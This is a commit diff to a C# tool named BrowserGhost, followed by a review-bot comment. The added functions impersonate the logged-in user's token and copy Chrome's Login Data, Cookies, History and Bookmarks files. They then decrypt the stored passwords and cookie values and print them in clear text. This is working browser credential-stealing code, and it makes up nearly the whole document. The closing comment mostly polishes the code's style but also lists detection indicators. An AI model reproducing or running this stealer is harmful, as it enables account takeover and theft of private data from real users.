
Commit f1d0574

authored
Update Program.cs
添加获取 history 、books、cookie
1 parent be7bbdb commit f1d0574


1 file changed

+197
-63
lines changed


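--- a/Program.cs
+++ b/Program.cs
@@ -1,23 +1,16 @@
-using System;
+using System;
 using System.Data;
-
 using System.Security.Cryptography;
 using System.Text;
 using System.Diagnostics;
-
 using System.IO;
-
 using CS_SQLite3;
-
 using System.Management;
-
 using System.Runtime.InteropServices;
 
 
 
 
-
-
 namespace BrowserGhost
 {
 class Program
@@ -308,6 +301,185 @@ public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
 }
 }
 
+public static bool Chrome_history()
+{
+string chrome_History_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\History";
+if (File.Exists(chrome_History_path) == true)
+{
+
+string cookie_tempFile = Path.GetTempFileName();
+File.Copy(chrome_History_path, cookie_tempFile, true);
+
+Console.WriteLine("\t[+] Copy {0} to {1}", chrome_History_path, cookie_tempFile);
+
+SQLiteDatabase database = new SQLiteDatabase(cookie_tempFile);
+string query = "select url,title from urls";
+DataTable resultantQuery = database.ExecuteQuery(query);
+foreach (DataRow row in resultantQuery.Rows)
+{
+string url = (string)row["url"];
+string title = (string)row["title"];
+
+Console.WriteLine("\t{0} \t {1}", url, title);
+
+}
+database.CloseDatabase();
+System.IO.File.Delete(cookie_tempFile);
+Console.WriteLine("\t[+] Delete File {0}", cookie_tempFile);
+
+}
+else
+{
+Console.WriteLine("[-] {0} Not Found!", chrome_History_path);
+}
+
+return true;
+}
+
+
+
+public static bool Chrome_cookies()
+{
+string chrome_cookie_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Cookies";
+if (File.Exists(chrome_cookie_path) == true)
+{
+string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
+string cookie_tempFile = Path.GetTempFileName();
+File.Copy(chrome_cookie_path, cookie_tempFile, true);
+
+Console.WriteLine("\t[+] Copy {0} to {1}", chrome_cookie_path, cookie_tempFile);
+
+SQLiteDatabase database = new SQLiteDatabase(cookie_tempFile);
+string query = "SELECT host_key, name,encrypted_value FROM cookies";
+DataTable resultantQuery = database.ExecuteQuery(query);
+foreach (DataRow row in resultantQuery.Rows)
+{
+string host_key = (string)row["host_key"];
+string name = (string)row["name"];
+byte[] cookieBytes = Convert.FromBase64String((string)row["encrypted_value"]);
+string cookie_value;
+try
+{
+//老版本解密
+cookie_value = Encoding.UTF8.GetString(ProtectedData.Unprotect(cookieBytes, null, DataProtectionScope.CurrentUser));
+
+//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
+}
+catch (Exception ex) //如果异常了就用新加密方式尝试
+{
+
+byte[] masterKey = GetMasterKey(chrome_state_file);
+cookie_value = DecryptWithKey(cookieBytes, masterKey);
+
+
+}
+Console.WriteLine("\t[{0}] \t {1}={2}",host_key,name, cookie_value);
+
+}
+database.CloseDatabase();
+System.IO.File.Delete(cookie_tempFile);
+Console.WriteLine("\t[+] Delete File {0}", cookie_tempFile);
+
+}
+else
+{
+Console.WriteLine("[-] {0} Not Found!", chrome_cookie_path);
+}
+
+return true;
+}
+
+
+//偷个懒 后面再解析json
+public static bool Chrome_books()
+{
+string chrome_book_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Bookmarks";
+if (File.Exists(chrome_book_path) == true)
+{
+
+string booktext = File.ReadAllText(chrome_book_path);
+Console.WriteLine(booktext);
+
+
+}
+else
+{
+Console.WriteLine("[-] {0} Not Found!", chrome_book_path);
+}
+
+return true;
+}
+public static bool Chrome_logins()
+{
+//copy login data
+string login_data_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
+
+if (File.Exists(login_data_path) == true)
+{
+string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
+string login_data_tempFile = Path.GetTempFileName();
+File.Copy(login_data_path, login_data_tempFile, true);
+
+Console.WriteLine("\t[+] Copy {0} to {1}", login_data_path, login_data_tempFile);
+
+SQLiteDatabase database = new SQLiteDatabase(login_data_tempFile);
+string query = "SELECT origin_url, username_value, password_value FROM logins";
+DataTable resultantQuery = database.ExecuteQuery(query);
+
+foreach (DataRow row in resultantQuery.Rows)
+{
+string url;
+string username;
+try
+{
+url = (string)row["origin_url"];
+username = (string)row["username_value"];
+}
+catch
+{
+continue;
+}
+
+
+byte[] passwordBytes = Convert.FromBase64String((string)row["password_value"]);
+string password;
+try
+{
+//老版本解密
+password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser));
+
+//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
+}
+catch (Exception ex) //如果异常了就用新加密方式尝试
+{
+
+byte[] masterKey = GetMasterKey(chrome_state_file);
+password = DecryptWithKey(passwordBytes, masterKey);
+
+
+}
+
+
+Console.WriteLine("\t[URL] -> {0}\n\t[USERNAME] -> {1}\n\t[PASSWORD] -> {2}\n", url, username, password);
+
+
+}
+database.CloseDatabase();
+System.IO.File.Delete(login_data_tempFile);
+Console.WriteLine("\t[+] Delete File {0}", login_data_tempFile);
+}
+else
+{
+Console.WriteLine("[-] {0} Not Found!", login_data_path);
+}
+
+
+
+return false;
+}
+
+
+
 static void Main(string[] args)
 {
 
@@ -325,70 +497,32 @@ static void Main(string[] args)
 if (processname == "explorer")
 {
 
-Console.WriteLine("[+] [{0}] [{1}] [{2}]", pid, processname, process_of_user);
+Console.WriteLine("[*] [{0}] [{1}] [{2}]", pid, processname, process_of_user);
 
 ImpersonateProcessToken(pid);
-Console.WriteLine("[+] Impersonate user {0}", Environment.UserName);
-Console.WriteLine("[+] Current user {0}", Environment.UserName);
-
+Console.WriteLine("[*] Impersonate user {0}", Environment.UserName);
+Console.WriteLine("[*] Current user {0}", Environment.UserName);
 
-//copy login data
-string login_data_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
-string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
-string login_data_tempFile = Path.GetTempFileName();
-File.Copy(login_data_path, login_data_tempFile, true);
+//密码
+Console.WriteLine("\n[*] Start Get Chrome Login Data");
+Chrome_logins();
 
-Console.WriteLine("[+] Copy {0} to {1}", login_data_path, login_data_tempFile);
+//获取书签
+Console.WriteLine("\n[*] Start Get Chrome Bookmarks");
+Chrome_books();
 
-SQLiteDatabase database = new SQLiteDatabase(login_data_tempFile);
-string query = "SELECT origin_url, username_value, password_value FROM logins";
-DataTable resultantQuery = database.ExecuteQuery(query);
+//cookie
+Console.WriteLine("\n[*] Start Get Chrome Cookie");
+Chrome_cookies();
 
-foreach (DataRow row in resultantQuery.Rows)
-{
-string url;
-string username;
-try
-{
-url = (string)row["origin_url"];
-username = (string)row["username_value"];
-}
-catch
-{
-continue;
-}
-
-
-byte[] passwordBytes = Convert.FromBase64String((string)row["password_value"]);
-string password;
-try
-{
-//老版本解密
-password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser));
-
-//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
-}
-catch (Exception ex) //如果异常了就用新加密方式尝试
-{
-
-byte[] masterKey = GetMasterKey(chrome_state_file);
-password = DecryptWithKey(passwordBytes, masterKey);
-
-
-}
-
-
-Console.WriteLine("\tURL -> {0}\n\tUSERNAME -> {1}\n\tPASSWORD -> {2}\n", url, username, password);
+Console.WriteLine("\n[*] Start Get Chrome History");
+Chrome_history();
 
-}
-database.CloseDatabase();
-System.IO.File.Delete(login_data_tempFile);
-Console.WriteLine("[+] Delete File {0}", login_data_tempFile);
 //回退权限
 RevertToSelf();
-Console.WriteLine("[+] Recvtoself");
-Console.WriteLine("[+] Current user {0}", Environment.UserName);
-break;
+Console.WriteLine("[*] Recvtoself");
+Console.WriteLine("[*] Current user {0}", Environment.UserName);
+
 
 }
 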
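Review bot: The four added methods (`Chrome_history`, `Chrome_cookies`, `Chrome_books`, `Chrome_logins`) have no summary comments, so nothing in the file records which profile files each one reads or that `Chrome_cookies` and `Chrome_logins` write decrypted cookie values and passwords to stdout in clear text; a one-line comment per method would do, e.g. `// Copies the profile's Cookies DB to a temp file and prints every decrypted row to the console`. Their return values are also inconsistent: `Chrome_logins` ends in `return false;` while the other three end in `return true;`, and the calls added in `Main` ignore all four, so `void` would be more honest. The last hunk removes the `break;` after `RevertToSelf()`, which presumably lets the enclosing loop (it starts outside the visible hunks) repeat for every `explorer` process; the description does not mention this and the intent should be stated in a comment. For readers on the detection side, what these lines show is a non-browser process copying `Login Data`, `Cookies` and `History` to `Path.GetTempFileName()` files and calling `ProtectedData.Unprotect` after `ImpersonateProcessToken`, and because the `File.Delete` calls sit only on the success path, a copy can remain in the temp directory when a query or decrypt throws.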
